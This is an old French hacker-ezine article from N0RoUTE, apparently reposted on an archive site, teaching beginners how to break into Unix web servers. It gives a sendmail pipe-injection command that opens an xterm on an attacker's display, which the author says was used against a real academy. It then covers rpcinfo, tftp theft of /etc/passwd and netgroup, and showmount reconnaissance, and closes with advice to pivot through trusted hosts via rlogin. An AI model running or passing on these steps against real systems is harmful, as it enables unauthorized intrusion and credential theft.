Copy Link
Add to Bookmark
Report

N0RoUTE Issue 2-10 Discours de la methode

eZine's profile picture
Published in 
N0RoUTE
 · 4 years ago

  

-----------------------------------------------------------------------------

(''''''''''''''''''')
( la bonne methode )
( By CoD4 )
( PhE! )
(___________________)

1: Introduction

J'ai voulu faire se petit file pour tous ceux qui en ont marre de passer par
PHF ou autre FTP writable :). C'est vrai que c'est le plus beau des bugs mais
bon, ca va un moment ;). Ca va etre aussi un petit article bien sympa pour
ceux qui debutent.

2: Let me play !!!

Voila ca fait longtemps que vous reviez de vous faire ce putain de site ;)
Bon, vous avez essaye le PHF mais il vous a gentiment dit qu'il etait pas la
:) Mais oui, 'faut poa rever non plus...

3: De la methode

Premier truc a faire: faites un tour par le Sendmail si vous avez droit
a un sendmail bien pourri genre 4.x ou 5.x, vous pouvez surement executer
des commandes par lui, exemple la methode qu'on a utilisé pour l'académie
de Aix-Marseille :)

mail from:"|xterm -display 123.123.123.123:0 & "
rcpt to: nosay
data
.
quit

Hop! la, le sendmail va vous envoyer un zoli xterm :)

5: rpcinfo

rpcinfo est ma commande preferée :) elle va nous en dire un peu plus sur
le site. Lancez ca : rpcinfo -p www.bibi.org

Hop! analysez bien tout ca :) regardez quel demon est present. Si il y a
ypserv ben il y'a NIS, yeah! vous pouvez lire mon filez inclu ce mois-ci dans
NoRoute :) on peut aussi voir si on as tftpboot ou bootparam (pour bootparam
allez faire un tour dans filez sur NIS =)

6: tftp

Ben la sa va etre cool :) essayez d'abord de choper le /etc/passwd.
Si vous l'avez et qu'il est pas shadow, ben c'est kewl. mais il y'a de fortes
chances k'il soit shadow :( bon si il y'a NIS vous pouvez quand meme recuperer
le nom de domain NIS sans trop de bleme et piquer le /etc/netgroup. Dedans,
vous avez le nom de domaine NIS a 90% de chances.

7: showmount

Pareil, faites un 'chit showmount -e www.bibi.org et regardez si la machine
fait confiance et surtout si elle exporte des repertoires a tout le monde, ce
qui est interessant c'est de voir a qui la machine exporte ses reps car il
est peut-etre plus facile de se faire l'autre machine pour ensuite revenir a
l'autre (la tache sera plus facile car ils se font confiance :)


8: Conclusion

N'oubliez pas qu'il sera souvent plus simple de se faire une machine
totalement perdue dans le domaine de la victim ke de se faire directement
le serveur WEB n'oubliez poa attaquez d'abord le plus faible :) puis
ensuite propagez vous a grands coups de rlogin et spoofez le reseau jusqu'a
arriver a votre cible !

Vous voyez que je ne parle de spoofing car en fait, il se trouve que je ne
aucun log de spoof capable de faire du rlogin :'/
v0x est en train d'n developper un :) peut-etre dans le prochain NoRoute
vous aurez un fabuleux spoofeur de rlogin :)

Sinon, comme vous le voyez cette article est vraiment sans pretention. Je
montre juste une methode qui me parait la plus valable. Si vous voulez en
savoir plus, ben relisez le filez quee mikasoft et moi meme avons ecrit pour
le #1 voila :) bye

CoD4! (raah, t'ecris trop mal mon gars :)) -- hOtCodE)
greetzZZ to : p4c3m4k3r voila un greetz rien ke pour lui :)
( on se comprends :)

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT